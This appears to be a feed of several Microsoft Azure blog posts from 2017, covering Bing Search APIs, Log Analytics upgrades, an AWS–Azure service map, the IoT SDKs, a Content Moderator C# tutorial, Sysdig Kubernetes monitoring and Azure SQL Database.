Bing Search API v7 and Bing Custom Search are now generally available

This post was authored by The Microsoft Cognitive Services Team.

Microsoft Cognitive Services enables developers to augment the next generation of applications with the ability to see, hear, speak, understand, and interpret needs using natural methods of communication.  
 
Today, we are announcing the general availability of Bing Custom Search API and Bing Search API v7. Showcased at Microsoft Ignite 2017 just last month, these APIs are now both available on the Azure Portal. 
 
Let’s dive into the features and how to get to started.

Bing Custom Search lets you create a highly-customized and targeted web search experience to deliver more relevant results from your targeted web space, through a commercial grade service. 
 
We listened to your feedback about the preview version we announced at Build 2017 and addressed the need for customized search solutions with Bing Custom Search. Businesses of any size, hobbyists and entrepreneurs can design and deploy web search applications for any possible scenario.
 
For example, Amicus has recently released a platform that changes the way charitable aid is funded and delivered, showing donors where every dollar is spent and giving non-profits real-time tools to report and measure performance. This allows donors to fund ‘projects’ instead of blindly giving money to an organization, and non-profits to build project requests based on measurable outcomes. This transition presented a very unique challenge: how to enable donors to research and learn about the projects and activities performed by non-profits? Amicus needed to help donors learn, find and fund projects that were of interest and relevant to them, something too complicated for traditional search engines.

With Bing Custom Search, part of Microsoft Cognitive Services, Amicus has been able to identify its own set of relevant web pages in advance: when users have a single concept of interest (like ‘water’, ‘education’ or ‘India’), Bing Custom Search is able to deliver highly relevant results in the context of global aid.

“This is exactly what our audience needs in order to learn about a broader range of important work performed by relief organizations, beyond those the donors currently know about. Bing Custom Search, part of Microsoft Cognitive Services, delivers a ‘Learn and Find’ experience in ways never before possible.” – says Beth Katz, Chief Product Officer at Amicus.
 
For more information about Bing Custom Search general availability pricing and included quantities for the Trial Tier, please visit the Bing Custom Search Pricing page. 
 
For more information about preview keys you might have, please refer to the related documentation. 
 
We’re also excited to announce the general availability of Bing Search APIs v7, which allows you to bring the immense knowledge of the planet to your applications. Results come back fast with improved performance for queries on the Bing Web Search API. 

We are pleased to announce several new updates to the program including new sorting and filtering options for finding specific results in trending topics or image searches, better error messages to ease troubleshooting and improve problem query diagnosis, and updated documentation to make it easier to bring the power of Bing Search APIs to your applications.

The v7 of Bing APIs include the following services:

Bing Web Search API (webpage, pricing page, and upgrade guide) offers enhanced search details from billions of web documents. 
Bing Image Search API (webpage, pricing page, and upgrade guide) includes thumbnails, full image URLs, publishing website info, image metadata, and more. 
Bing Video Search API (webpage, pricing page, and upgrade guide) includes useful metadata such as the creator, encoding format, video length, view count, and more. 
Bing News Search API (webpage, pricing page, and upgrade guide) includes authoritative images of the news article, related news and categories, trending topics, provider information, article URLs, and dates images were added. 
Bing Autosuggest API (webpage, pricing page, and upgrade guide)) helps users complete queries faster by adding intelligent type-ahead capabilities to an app or website. 
Bing Spell Check API (webpage, pricing page, and upgrade guide) helps correct spelling errors, recognizing the difference among names, brand names, and slang, and understanding homophones as they’re being typed. 

Please check out the documentation, migration guide and pricing links listed above which will help you better understand how to handle the existing v5 keys and migrate from API v5 to API v7. 
 
For questions or feedback please visit Stack Overflow and Azure Support.

-The Microsoft Cognitive Services Team
Quelle: Azure

Azure Log Analytics workspace upgrades are in progress

If you’re currently using Azure Log Analytics to monitor your environments for availability and performance, we’re rolling out new enhancements and changes for Log Analytics that you should be aware of. Including the new and improved query language, so that you can take appropriate action, if necessary. To take advantage of these enhancements, you’ll need to upgrade your workspaces. The upgrade is currently available in these regions: WCUS, SEAU, SEA, WEU, EJP, SUK, CID and CCAN.

The upgrade process converts all saved searches, alerts, and views to the new query language. ​About 50 percent of all Azure Log Analytics workspaces have been upgraded by now, and thousands of customers are enjoying the simple yet powerful query language.

Upgrading your workspace

This upgrade introduces an improved search experience, powered by a highly scalable platform. The new experience includes an interactive and expressive query language, machine learning constructs and a portal for advanced analytics, offering a multiline query editor, full schema view and rich visualizations to help you get deeper insights from your data. Learn more about the new query language.

To take advantage of the following language benefits and more, you’ll need to upgrade your Log Analytics workspace:

Simple yet powerful. Easier to understand and similar to SQL with constructs like a natural language.
Full piping language. Extensive piping capabilities where any output can be piped to another command to create complex queries that were possible previously.
Search-time field extractions. Calculated fields at runtime lets you use complex calculations for extended fields and then use them for additional commands including joins and aggregations.
Advanced joins. Ability to join tables on multiple fields, using inner and outer joins, and join on extended fields.
Date/time functions. Advanced date/time functions that gives you greater flexibility.
Smart Analytics. Advanced algorithms to evaluate patterns in datasets and compare different sets of data.
See more information in “Why the new language?”.

Notes:

To execute the upgrade process, you must be assigned with Owner access management rights to the workspace​.
The workspace upgrade and the new Log Analytics language are not available in FairFax currently. The upgrade in FairFax will start in a few months and a separate communication will be sent on it.

Experience changes after you upgrade

Some experiences work differently after the workspace upgrade. We made an effort to make these changes clear to let you make the necessary actions, if needed. You can find more details on these in known issues and FAQs page.

My dashboard is being deprecated, in favor of View Designer and Azure Dashboards – Existing tiles become read-only. ​
Power BI integration is replaced with a new process. Any existing schedules will be disabled. ​
ARM templates can be used to create and configure Log Analytics workspaces. The versions of the upgraded API and examples of tasks you can perform are available here.
Alert actions using webhooks and runbooks will need to be updated to conform to a different response format. ​
Deprecation of Log Search API and PowerShell Cmdlet (December 31, 2017). Any use of Log Search API and Get-AzureRmOperationalInsightsSearchResults Cmdlet should be migrated to Azure Log Analytics REST API and Invoke-LogAnalyticsQuery PowerShell Cmdlet using the new query language.

Upgrade rollout schedule

The new Log Analytics language change and deprecation of the old language, requires that all workspaces are upgraded. We are rolling out the upgrade to workspaces that were not upgraded yet according to this schedule:

New workspace creation (week of October 16, 2017). New workspaces are created with the new Log Analytics language. You cannot create legacy workspaces using the legacy language.

Automatic workspace upgrade (start on the week of October 30, 2017). We will start rolling out automatic workspace upgrades, all workspaces that haven’t been upgraded will be automatically upgraded to the new Log Analytics language. This process will be gradual per region and carried out in this order:

Notes:

If you have upgraded your workspaces already, you don’t need to worry about automatic upgrades.
Although the automatic upgrade in WCUS and WEU regions will start in a few months, you can follow the banner in your workspace and upgrade it now.

Additional resources:

New and improved Log Analytics announcement
Azure Log Analytics query language
Known issues and FAQs
Log Analytics documentation
How to upgrade
Known issues and frequently asked questions

If you have questions, please contact us.
Quelle: Azure

Cloud Service Map for AWS and Azure Available Now

Today, we are pleased to introduce a new cloud service map to help you quickly compare the cloud capabilities of Azure and AWS services in all categories. Whether you are planning a multi-cloud solution with Azure and AWS, or simply migrating to Azure, you will be able to use this service map to quickly orient yourself with the services required for a successful migration. You can use the service map side-by-side with other useful resources found in our documentation.

Excerpt from the Compute Section from the Cloud Service Map for AWS and Azure

The cloud service map (PDF available for download) is broken out into 13 sections to make navigation between each service simple:

Marketplace – Cloud marketplace services bring together native and partner service offerings to a single place, making it easier for customers and partners to understand what they can do.
Compute – Compute commonly refers to the collection of cloud computing resources that your application can run on.
Storage – Storage services offer durable, highly-available, and massively-scalable cloud storage for your application, whether it runs in the cloud or not.
Networking & Content Delivery – Allows you to easily provision private networks, connect your cloud application to your on-premises datacenters, and more.
Database – Database services refers to options for storing data, whether it’s a managed relational SQL database that’s globally distributed or multi-model NoSQL databases designed for any scale.
Analytics and big data – Make the most informed decision possible by analyzing all of the data you need in real time.
Intelligence – Intelligence services enable natural and contextual interaction within your applications, using machine learning and artificial intelligence capabilities that include text, speech, vision, and search.
Internet of Things (IoT) – Internet of Things (IoT) services connect your devices, assets, and sensors to collect and analyze untapped data.
Management & monitoring – Management and monitoring services provide visibility into the health, performance, and utilization of your applications, workloads, and infrastructure.
Mobile services – Mobile services enable you to reach and engage your customers everywhere, on every device. DevOps services make it easier to bring a higher quality app to market faster, and a number of engagement services make it easier to deliver performant experiences that feel tailored to each user.
Security, identity, and access – A range of capabilities that protect your services and data in the cloud, while also enabling you to extend your existing user accounts and identities, or provisioning entirely new ones.
Developer tools – Developer tools empower you to quickly build, debug, deploy, diagnose, and manage multi-platform, scalable apps and services.
Enterprise integration – Enterprise integration makes it easier to build and manage B2B workflows that integrate with third-party software-as-a-service apps, on-premises apps, and custom apps.

The guidance is laid out in a convenient table that lets you easily locate and learn more about each service you are most interested in. In this instance, you can quickly see the service name, description and the name of the services in AWS and Azure. We’ve also provided hyperlinks for each Azure service.

Beyond service mapping, it’s worth noting that the Azure documentation provides a large array of additional resources to help app developers be successful with Azure. Here are just a few links to help get you started:

Downloadable PDF of the Cloud Service Map for AWS and Azure
Build and host your first web or mobile app using the languages, tools, and platform you love
Use relational database-as-a-service to host your high-performance and data-driven apps
Manage and monitor apps to help diagnose issues, improve performance, and assess usage
The Developer’s Guide to Microsoft Azure eBook

Thanks for reading and keep in mind that you can learn more about Azure by following our blogs or Twitter account. You can also reach the author of this post on Twitter.
Quelle: Azure

Benefits of using the Azure IoT SDKs, and pitfalls to avoid if you don’t

Azure IoT provides a set of open-source Software Development Kits (SDKs) to simplify and accelerate the development of IoT solutions build with Azure IoT Hub. Using the SDKs in prototyping and production enables you to:

Develop a “future-proof” solution with minimal code: While you can use protocol libraries to communicate with Azure IoT Hub, you may come back to this decision later and regret it. You will miss out on a lot of upcoming advanced features of IoT Hub and spend time redeveloping code and functionality that you could get for free. The SDKs support new features from IoT Hub, so you can incorporate them with minimal code and ensure your solution is up-to-date.
Leverage features designed for a complete software solution and focus on your specific need: The SDKs contain many libraries that address key problems and needs of IoT solutions such as security, device management, reliability, etc. You can speed up time to market by leveraging these libraries directly and focus on developing for your specific IoT scenario.
Develop with your preferred language for different platform: You can develop with C, C#, Java, Node.js, or Python without worrying about protocol specific intricacy. The SDKs provide out-of-box support for a range of platforms and the C SDK can be ported to new platforms.
Benefit from the flexibility of open source with support from Microsoft and community: The SDKs are available open source on GitHub and we work in the open. You can modify, adapt, and contribute to the code that will run your devices and your applications.

Get started with the SDKs! The rest of the blog provides more details for IoT cloud and device developers on why and how you can use the Azure IoT SDKs, as well as the recommended best practices to develop IoT solutions. Code snippets from the SDKS are shown to demonstrate concepts. Here is where you can find a comprehensive list of our SDKs.

Future proof for new IoT Hub features

Developers who prefer to use protocol libraries to develop custom solutions can use REST, AMQP and MQTT APIs exposed by IoT Hub. However, developers using these low-level protocols must deal with the intricacies of implementing complex device-to-cloud communication patterns. In addition, the IoT industry is quickly evolving past simple scenarios. Essential features like device management, security and digital twin require manipulating interfaces with a higher level of abstraction. Relying on protocol libraries means you will need to reimplement those abstractions later.

With the SDKs, your solution is future-proof with less hassle down the road. The SDKs expose simple protocol agnostic APIs for advanced features of IoT Hub so you can leverage new features with minimal code. For example, IoT Hub released a file upload feature which allows devices to upload files to the cloud. To use this feature in your solution, you only need to update the SDKs to a version that supports this feature, and make the call to IoTHubClient_UploadToBlobAsync() in your solution (API shown for C SDK). Some features come for free. Instead of implementing a retry logic for your solution, you get the industry best practice for retry logic – exponential backoff with jitter – as the default. This is much faster than writing and maintaining your own custom implementation for these advanced features.

Azure IoT Hub Device Provision Service, automates device registration and configuration. The SDKs provide a high-level interface to abstract details like transport method. It also provides a security client to group authentication mechanism and hardware modules under one common interface. Device application developers can focus on customizing first run experience, instead of spending their time on complex hardware-level security. Support for the Device Provisioning Service is available for C SDK in public preview and will be supported in other languages as well. 

Complete software solution for your needs

Regardless of the complexity of your IoT scenario, you need to develop the software on physical things or gateways to be deployed in the field, and a back-end service software for device monitoring and management. The SDKs cover both ends. In addition, they are designed as a complete software solution for device management, security, reliability, diagnostics, bandwidth savings and quality. You can dedicate your energy to developing for your specific need, instead of reimplementing these features. Here are some of the value proposition for using the SDKs in your solution.

Device management

The SDKs provide out-of-box device management infrastructure through features released by IoT Hub, including device twins and direct methods. Operations for managing device twins and invoking methods are straight forward with the SDKs taking care of the authentication, synchronization of the twin, identification of the changes for you on both the device side and the service sides.

You can develop quickly by leveraging building blocks like store and query device metadata, report and synchronize state information, invoke and handle methods to handle operations like update firmware and configuration or execute commands.

How-to guides like Get started with device twins and Use direct methods complement the open source samples describing the use of the APIs.

Security

Azure IoT provides a secure end-to-end Internet of Things platform. Secure your IoT deployment discusses IoT Hub’s security infrastructure in detail. As a developer, you can establish secure connection with devices quickly using the SDKs. IoT hub offers several secure authentication mechanisms including SAS tokens and X.509 certificates. If you choose to use security tokens, the SDKs can generate tokens without requiring any special configuration for most scenarios. If you choose to use X.509, the SDKs provide a device client that supports use of X.509 certificates and a service client to register devices that use X.509 certificate identities.

As Azure IoT continues to improve security, new support for Device Identifier Composition Engine (DICE) and different kinds of Hardware Security Modules (HSMs) was recently added (this blog provide details). The SDKs evolve with Azure IoT Hub and make security simpler and now offer a library which enables the use of different HSMs through a simple interface to DICE and Trusted Platform Module (TPM) compatible secure storages. This library makes it trivial to integrate devices in a scenario involving secure provisioning of devices at scale with the Device Provisioning Service mentioned earlier.

Reliability

The SDKs include several reliability features as well.

Retry policy for unsuccessful device-to-cloud communication is an example, addressing the problem of intermittent and non-reliable connectivity inherent to IoT devices. The SDKs offer the industry best-practice for retry policy, exponential back-off with random jitter, and the option to customize, taking into account the battery constrains of devices.

The SDKs also implement different connectivity features such as customizable keep-alives times to efficiently maintain cloud-to-device connectivity, support for connection to IoT Hub from networks behind a proxy, turning tracing on or off for the transports, etc. This document describes different connectivity features in the C SDK.

Diagnostics

In addition to providing simple APIs for IoT Hub features, the SDKs also provide diagnostics to aid debugging. The SDKs handle error reporting for error codes emitted by IoT Hub, including exceeded quotas, authentication error, throttling, device not found, etc.

Bandwidth savings

Depending on your IoT scenario, sending data too frequently may incur avoidable costs. The SDKs provide several out-of-the-box solutions for bandwidth savings. Buffering allows the device to store data when connectivity is poor instead of attempting retries. Batching reduces the number of messages transmitted by merging information from multiple messages into a single batch of messages, thus reducing network bandwidth usage. Multiplexing reduces the number of connections by having multiple devices share the same connection.

Quality

The SDKs are developed by Microsoft engineers and go through a rigorous engineering process to ensure quality. Features are covered with both unit and end-to-end tests. Prior to each bi-weekly release, the SDKs are tested with a gated build system for supported platforms to ensure no regression.

Broad language and platform support

Depending on the IoT scenario and your developer experience, you may have a preferred language or platform. The SDKs got you covered. Broad language and platform support with protocol flexibility allows you to develop in your preferred environment without worrying about protocol specific intricacy. Five languages are currently supported: C, C#, Java, Node.js, and Python. We strive to maintain consistency of APIs across the five languages, as much as language specific constructs allow.

Each language is being maintained as a public repository on GitHub, including sample code and documentation. In addition, the SDKs are available as binary packages from Nuget for C#, Maven for Java, apt-get for some Linux Distributions, npm for Node.js and pip for Python.

The SDKs are regularly tested on the following platforms (when languages apply):

Linux (Ubuntu, Debian, Raspbian)
Windows
MBED
Arduino (Huzzah, ThingDev, FeatherM0), FreeRTOS (ESP32, ESP8266)
.NETFramework 4.5, UWP, PCL (Profile 7 – UWP, Xamarin.iOS, Xamarin.Android), .NetMicroFramework, .NetStandard 1.3
Intel Edison

You can find an exhaustive list of the OS platforms the various SDKs have been tested against in the Azure Certified for IoT device catalog. If a platform is not supported, our C SDK is developed in ANSI C99 and can be ported easily following this guide.

Open Source with Support from Microsoft and community

Good open source practice and regular release

Azure IoT SDKs team follow open source best practices and work in the open. If you want to contribute back, simply create a pull request following this guideline. The engineers also monitor questions on Stack Overflow and GitHub closely to resolve any issues in a timely manner. You can track our progress through commits on the public repository.

The SDKs are developed in the master branch of their respective GitHub repositories and a new version is stamped on a bi-weekly basis and package downloaders released at the same time, which means fast turnaround for any new feature release, bug fixes and merge requests. Features supported by the SDKs and roadmap for development are published on each repo’s GitHub page, updated also on a bi-weekly basis with each release.

Long Term Support

Some developers are wary of behavioral or functional breaking changes that may affect devices in the field. The Azure IoT Hub service is a PaaS that exposes bare APIs that are versioned, guarantying continuity of behavior and function when using with a specific version of the service API. To further and complete this engagement at the client level, the SDKs offer a Long Term Support (LTS) version. LTS branches are shielded from unwanted changes. They will still receive all security bug fixes and critical bug fixes. A new LTS version will be created every 6 months with one-year lifetime.

Support plans

You are supported by Microsoft as part of your Azure subscription. Depending on the issue’s priority and severity, you can reach out to Azure Support directly via various plans.

Documentation

Documentation for various developing needs is available. Azure IoT Development Center provides a single landing page for anything developer, linking to resources such as training content, full API documentation, How-To guides. The developer guide part of the Azure documentation provides how-to tutorials to help you get started with various IoT Hub features. GitHub repositories contains instructions on how to get started from source code and feature supported in the SDKs. A list of sample applications showing how to use various IoT Hub features are also provided. You can provide feedback on documentation via GitHub issues and comments directly on the online documentation.

Best practice for using IoT Hub without the SDKs

Azure IoT SDKs are licensed under MIT license giving you all the flexibility you need for your development, with no restriction in modification and redistribution.

If you still choose or need to use a third party protocol client or your own solution, here are some guidelines to avoid security breaches and ensure reliability.

Access control and authentication with IoT Hub
IoT Hub endpoints
Choose a communication protocols
Manage device identities
Device to Cloud features guide
Cloud to Device feature guide
Send and Receive messages

Send device to cloud messages
Read device to cloud messages
Use custom endpoints and routing rules
Send cloud to device messages
IoT Hub messages construct

Understand device twins
Understand device methods
Schedule jobs on multiple devices
IoT Hub query language
Upload files from a device
Understand quotas and throttling

In addition to these, you will need to bear in mind your IoT solution specifics considering device constrains and communication limitations. What should your retry and buffering logic be to save battery and limit bandwidth usage? How and where do you securely store device credentials? How will you provision devices at scale?

Getting started with Azure IoT SDKs

Excited about using the SDKs for development? Getting started is simple. This guide provides an overview for developing with our SDKs. Navigate to the GitHub repository of your preferred language, learn about the supported features and get started with samples. You can also download the SDKs as binary packages from popular package registries and run the sample applications on your device with a few steps. For example, follow this tutorial to get started with our C SDK.
Quelle: Azure

Microsoft Cognitive Services – How Content Moderator helps to boost online safety

Microsoft Cognitive Services enables developers to augment the next generation of applications and enhance their ability to see, hear, speak, understand, and interpret needs using natural methods of communication. Think about the possibilities: being able to add vision and speech recognition, emotion and sentiment detection, language understanding, and search, to applications without having any data science expertise.

Content Moderator is part of Cognitive Services allowing businesses to use machine-assisted moderation of text and images, augmented with human review tools.

What are Content Moderator’s capabilities?

Content Moderator helps track, flag, and assess potentially offensive and unwanted content on social media websites, chat and messaging platforms, enterprise environments, gaming platforms, and more, and flag that content for human review. The following capabilities are included:

Image moderation: The image moderation API enhances your ability to detect potentially offensive or unwanted images through machine-learning based classifiers, custom lists, and optical character recognition (OCR).
Text moderation: The text moderation API helps you detect potential profanity in several languages. You don’t have to restrict matching to the terms included with the service. You can create custom lists with terms specific to your business domain.
Video moderation: The video moderation capability is currently in private preview on Azure Media Services. It enables detection of potential adult content in videos.
Human review tool: The human review tool when used together with the moderation APIs allows you to implement human-in-the-loop processes while benefiting from the cost and speed efficiencies of machine learning.

How Lightspeed Systems powered their online safety tool for schools

Lightspeed Systems provides software systems to help schools protect their students from inappropriate and offensive content. It turned to Content Moderator from Microsoft and found it to be more effective than alternative technologies in identifying the offensive content. It was also easy to integrate with.

“Compared with other solutions, Content Moderator does a better job of categorizing images and assessing whether they contain adult content…I consider it a tool I can really rely on.” Says Rob McCarthy, Founder of Lightspeed Systems.

To learn more, please take a look at Lightspeed Systems case study.

Getting started

We’re providing a lot of tutorials to quickly get started with Content Moderator.

How to start with the human review tool

Follow the steps in the review tool quick-start to check out the automated moderation and human-in-the-loop capabilities without writing a single line of code. The review tool internally calls the automated moderation APIs and presents the items for review right within your web browser. You invite other users to review, track pending invites, and assign permissions to your team members.

How to leverage the automated moderation APIs

If you sign up for the review tool, you will find your free tier key in the Credentials tab under Settings, as shown in the following screenshot:

Use your API key and follow the quick start steps outlined in the Image API and the text API sections. Use the review API to auto-moderate content in bulk and review the tagged images or text within the review tool. Provide your API callback point so that you get notified when the reviewers submit their decisions. This feature allows you to automate the post-review workflow by integrating with your own systems.

Content moderation in an E-commerce scenario

Let’s say I’ve got an E-commerce site and would need learn how to use the Content Moderator platform along with additional cognitive services such as Computer Vision and Custom Vision services.

The purpose would be to combine machine assisted classification with human review capabilities to classify E-commerce catalog images.

I would like to use machine-assisted technologies to classify and moderate product images in these categories:

Adult (Nudity)
Racy (Suggestive)
Celebrities
US Flags
Toys
Pens

Overall, I’ll need to do the following:

A. Sign up and create a Content Moderator team.

B. Configure moderation tags (labels) for potential celebrity and flag content.

C. Use Content Moderator's image API to scan for potential adult and racy content.

We can also go further and use the Computer Vision API to scan for potential celebrities, leveraging the Custom Vision service to scan for the possible presence of flags and present the nuanced scan results for human review and final decision making.
 

A. First, let’s create a team

I can either sign up with my Microsoft account or create an account on the Content Moderator web site.

Let’s navigate to the Content Moderator sign up page.

Click Sign Up

To create a team, I’ll see a "Create Team" screen. I need to give my team a name. If I want to invite colleagues, I can do so by entering their email addresses.

More information can be found in the Quickstart page to sign up for Content Moderator and create a team. Note the Team ID from the Credentials page.

B. Let’s define custom tags

Please refer to the Tags article to add custom tags. In addition to the built-in adult and racy tags, the new tags allow the review tool to display the descriptive names for the tags. In our case, we define these custom tags (celebrity, flag, us, toy, pen):

Now, let’s list my API keys and endpoints:

The tutorial uses three APIs and the corresponding keys and API end points.
The API end points are different based on your subscription regions and the Content Moderator Review Team ID.

Keep in mind that this walkthrough is designed to use subscription keys in the regions visible in the following endpoints. So I need to be sure to match the API keys with the region Uris otherwise the keys may not work with the following endpoints:

// Your API keys
public const string ContentModeratorKey = "XXXXXXXXXXXXXXXXXXXX";
public const string ComputerVisionKey = "XXXXXXXXXXXXXXXXXXXX";
public const string CustomVisionKey = "XXXXXXXXXXXXXXXXXXXX";

// Your end points URLs will look different based on your region and Content Moderator Team ID.
public const string ImageUri = "https://westus.api.cognitive.microsoft.com/contentmoderator/moderate/v1.0/ProcessImage/Evaluate";
public const string ReviewUri = "https://westus.api.cognitive.microsoft.com/contentmoderator/review/v1.0/teams/YOURTEAMID/reviews";
public const string ComputerVisionUri = "https://westcentralus.api.cognitive.microsoft.com/vision/v1.0";
public const string CustomVisionUri = "https://southcentralus.api.cognitive.microsoft.com/customvision/v1.0/Prediction/XXXXXXXXXXXXXXXXXXXX/url";

C. Scan for adult and racy content

The function takes an image URL and an array of key-value pairs as parameters.
It calls the Content Moderator's Image API to get the Adult and Racy scores.
If the score is greater than 0.4 (range is from 0 to 1), it sets the value in the ReviewTags array to True.
The ReviewTags array is used to highlight the corresponding tag in the review tool.

public static bool EvaluateAdultRacy(string ImageUrl, ref KeyValuePair[] ReviewTags)
{
float AdultScore = 0;
float RacyScore = 0;

var File = ImageUrl;
string Body = $"{{"DataRepresentation":"URL","Value":"{File}"}}";

HttpResponseMessage response = CallAPI(ImageUri, ContentModeratorKey, CallType.POST,
"Ocp-Apim-Subscription-Key", "application/json", "", Body);

if (response.IsSuccessStatusCode)
{
// {“answers”:[{“answer”:“Hello”,“questions”:[“Hi”],“score”:100.0}]}
// Parse the response body. Blocking!
GetAdultRacyScores(response.Content.ReadAsStringAsync().Result, out AdultScore, out RacyScore);
}

ReviewTags[0] = new KeyValuePair();
ReviewTags[0].Key = "a";
ReviewTags[0].Value = "false";
if (AdultScore > 0.4)
{
ReviewTags[0].Value = "true";
}

ReviewTags[1] = new KeyValuePair();
ReviewTags[1].Key = "r";
ReviewTags[1].Value = "false";
if (RacyScore > 0.3)
{
ReviewTags[1].Value = "true";
}
return response.IsSuccessStatusCode;
}

Then, I can also scan for celebrities, classify into flags, toys, and pens, review for human-in-the-loop, submit batch of images and initiate all scans.

All of the additional steps of this tutorial are present in the full tutorial.

Feel free to take a look at our additional scenario of Content Moderator with a sample Facebook page, in which the solution either takes down or allows publishing of images and text by viewers of the Facebook page.

Happy coding!

Sanjeev Jagtap
Senior Product Manager – Content Moderator
Microsoft Cognitive Services Team
Quelle: Azure

Unifying monitoring and security for Kubernetes on Azure Container Service

We’ve seen an increase in container workloads running in production environments and a new wave of tooling that’s cropped up around container deployments. Microsoft Azure has a number of different partners in the container space and today we’re featuring a new product from Sysdig. Sysdig Secure, run-time container security and forensics.

Pushing container and microservice based applications into production will radically change the way you monitor and secure your environment. In this post we’ll review the challenges of this new infrastructure and give a number of examples of monitoring and securing Kubernetes on Azure container services with Sysdig.

How to instrument your Azure environment using helm with Sysdig

Best practices for leveraging Kubernetes metadata to optimize and secure your containers

How troubleshooting and forensics has changed in containerized environments

Why unify Monitoring & Security?

“The purpose and intent of DevSecOps is to build on the mindset that 'everyone is responsible for security' with the goal of safely distributing security decisions at speed and scale to those who hold the highest level of context without sacrificing the safety required.” – DevSecOps

The rise of DevSecOps has created new platform for operators who are in charge of providing container based platforms as a service for their own development teams. This includes giving teams all the performance tooling they need to make sure the services they run are stable as well as secure.

These platform operators focus their workflows around two main concepts:

Visibility – what’s the performace of my service? Is my infrastructure safe?

Forensics – what happened to the deployment that crashed? What unexpected outbound connection was spawned, and what data was written to disk?

While the questions you ask for monitoring and security are different the workflow is the same. Sysdig provides developers a unified experience for interacting with their data from a single instrumentation point with low system and cognitive overhead.

Getting Started with Kubernetes on Azure Container Service (ACS) & Sysdig

If you’re new to ACS check out this post [SD1] [KA2] to get step by step instructions for deploying Kubernetes or your favorite orchestrator up and running in minutes.

We’ll be using a helm chart to instrument our environment which will start the Sysdig agent on each of our hosts in the Kubernetes cluster. For more info about how Sysdig collects data from your environment check out our how it works page.

Visibility into Kubernetes Services

Performance Monitoring

One of the best parts of Kubernetes is how extensive their internal labeling is. We take advantage of this within grouping in Sysdig Monitor. You’re able to group and explore your containers based on their physical hierarchy (for example > Host > pod > container) or based on their logical microservice hierarchy (for example, namespace > replicaset > pod > container).

Click on each of these images and see the difference between a physical and a logical grouping to monitor your Docker containers with Kubernetes context.

If you’re interested in the utilization of your underlying physical resource (eg. identifying noisy neighbors) then the physical hierarchy is great. But if you’re looking to explore the performance of your applications and microservices, then the logical hierarchy is often the best place to start.

In general, the ability to regroup your infrastructure on the fly is a more powerful way to troubleshoot your environment as compared to the typical dashboard.

Securing Kubernetes Services

This same metadata can be used to protect your Kubernetes services. Using a label like kubernetes.deployment.name, we can enforce a policy to protect a logical service regardless of how many containers, hosts, or azure regions that deployment is running in.

What we’re looking at below is a policy to protect my redis Kubernetes deployment from an exfiltration event by detecting an unexpected outbound connection from that logical service. From there, we can also take actions on any policy violation to stop the container before any data has left our redis service.

Forensics in Container Environments

Doing forensics for troubleshooting and incident response both face the same challenge: containers are ephemeral and the data we want is often long gone. Also, they’re essentially black boxes and it’s often hard to tell what’s actually running inside of them.

We don’t have time to ssh into the host and run a core dump if Kubernetes is killing our containers. Our system needs to proactively capture all activity with the ability to troubleshoot that data outside of production.

Sysdig’s unique instrumentation allows us to capture all activities from users, system calls, network, processes, and even contents written to file or passed over to the network pre and post policy violation. This is something that has so much data it’s best explained over a quick one minute video. Check out this analysis of what can happen when a user spawns a shell in a container, and all the data we can collect about their subsequent actions.

Conclusion

While the end result of your analysis might be different between monitoring and security platforms, the data and the workflow are often the same. You need to be able to view your infrastructure through a Kubernetes lens, and see rich activity about everything going on in your hosts. See Sysdig’s full visibility and forensics capabilites with a single container agent per host from this webinar or get started in less than 3 minutes with helm.
Quelle: Azure

Put your databases on autopilot with a lift and shift to Azure SQL Database

The sheer volume of data generated today and the number of apps and databases across enterprises is staggering. To stay competitive and get ahead in today’s marketplace, IT organizations are always looking at ways to optimize how they maintain and use the data that drives their operations. Faced with constant demands for more scale and reliability amid the ongoing threat of cybersecurity attacks, IT organizations can quickly stretch their staffing and infrastructure to the breaking point. In addition to these operational issues, businesses need to look at how to best harness their data to build better apps and fuel future growth. Organizations are increasingly looking for ways to automate basic database administration tasks, from daily management to performance optimization with best in class AI-driven intelligent PaaS capabilities. Azure SQL Database is the perfect choice to deliver the right mix of operational efficiencies, optimized for performance and cost, enabling you to focus on business enablement to accelerate growth and innovation.

Azure SQL Database helps IT organizations accelerate efficiencies and drive greater innovation. With built-in intelligence based on advanced machine learning technology, it is a fully-managed relational cloud database service that’s designed for SQL Server databases, built to maximize application performance and minimize the costs of running a large data estate. The latest world-class SQL Server features are available to your applications, like in-memory technologies that provide up to 30x improved throughput and latency and 100x perf improvement on your queries over legacy SQL Server editions. As a fully-managed PaaS service, SQL Database assumes much of the daily administration and maintenance of your databases, including the ability to scale up resources with near-zero downtime. This extends to ensuring business continuity with features like point-in-time restore and active geo-replication that help you minimize data loss with an RPO of less than 5 seconds. And, it’s supported by a financially-backed 99.99% SLA commitment. The benefits of a fully-managed SQL Database led IDC to estimate up to a 406% ROI over on-premises and hosted alternatives, making it an economical choice for your data. 

DocuSign, the global standard for eSignature and digital transaction management (DTM), wanted to scale quickly into other international markets and chose Microsoft Azure as its preferred cloud services platform. Partnering with Microsoft meant combining the best of what DocuSign does in its data center, reliable SQL Servers on flash storage, with the best of what Azure could bring to it: a global footprint, high scalability, rapid deployment and deep experience managing SQL at scale. Check out this video to learn more about DocuSign’s experience.

The right option for your workload

When considering a move to the cloud, SQL Database provides three different deployment options for your data, providing you with a range of performance levels and storage choices to suit your needs. 

 

Single databases are assigned a certain amount of resources via Basic, Standard, and Premium performance tiers. They focus on a simplified database-scoped programming model and is best for applications with a predictable pattern and relatively stable workload.

Elastic pools are unique to SQL Database. While they, too, have Basic, Standard and Premium performance tiers, pools are a shared resource model that enables higher resource utilization efficiency. This means that all the databases within an elastic pool share predefined resources within the same pool. Like single databases, elastic pools focus on a simplified database-scoped programming model for multi-tenant SaaS apps and are best for workload patterns that are well-defined. It’s highly cost-effective in multi-tenant scenarios.

We recently announced the upcoming fall preview for SQL Database Managed Instance, the newest deployment option in SQL Database, alongside single databases and elastic pools.

“Lift and shift” your data to the cloud 

Whereas single and elastic databases focus on a simplified database-scoped programming model, SQL Database Managed Instance provides an instance-scoped programming model that is modeled after and therefore highly compatible with on-premises SQL Server 2005 and newer, enabling a database lift-and-shift to a fully-managed PaaS, reducing or eliminating the need to re-architect your apps and manage them once in the cloud.

With SQL Database Managed Instance, you can continue to rely on the tools you have known and loved for years, in the cloud, too. This includes features such as SQL Agent, Service Broker and Common Language Runtime (CLR). But, you can also benefit from using new cloud concepts to enhance your security and business continuity to levels you have never experienced before, with minimal effort.  For example, you can use SQL Audit exactly as you always have, but now with the ability to run Threat Detection on top of that, you can proactively receive alerts around malicious activities instead of simply reacting to them after the fact.

